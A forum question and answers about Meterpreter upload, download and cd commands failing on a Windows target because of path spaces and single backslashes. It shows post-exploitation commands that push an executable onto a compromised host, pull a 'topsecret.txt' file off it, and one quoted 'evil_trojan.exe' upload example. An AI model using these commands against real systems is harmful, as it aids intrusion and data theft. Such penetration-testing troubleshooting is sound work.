# metasploit dont work upload, download and open folder

Tags: metasploit, meterpreter

When I am trying to upload a file, download a file or enter a folder, metasploit does not work. Path of metasploit is in meterpreter.

```
meterpreter>
upload /root/Desktop/test.exe C:\\Documents and Settings\\PC_1\\Escritorio
[*] uploading  : /root/Desktop/test.exe -> Settings\PC_1\Escritorio
[-] core_channel_open: Operation failed: The system cannot find the path specified.

download C:\\Documents and Settings\\PC_1\\Escritorio\\topsecret.txt
[-] stdapi_fs_stat: Operation failed: The system cannot find the file specified.

cd C:\Documents and Settings\PC_1\Escritorio
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
```

Comment: I believe that you may need to put the target location in quotation marks, due to the spacing in file naming, i.e. `"C:\\Documents and Settings\\PC_1\\Escritorio"`

Answer (score 3):

Take a look at the [Metasploit commands glossary](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/#upload).

As the example shows, you need to use double back slashes, not just one.

```
meterpreter > upload evil_trojan.exe c:\\windows\\system32
```

This is also stated in the [download command](https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/#download):

Note the use of the double-slashes when giving the Windows path.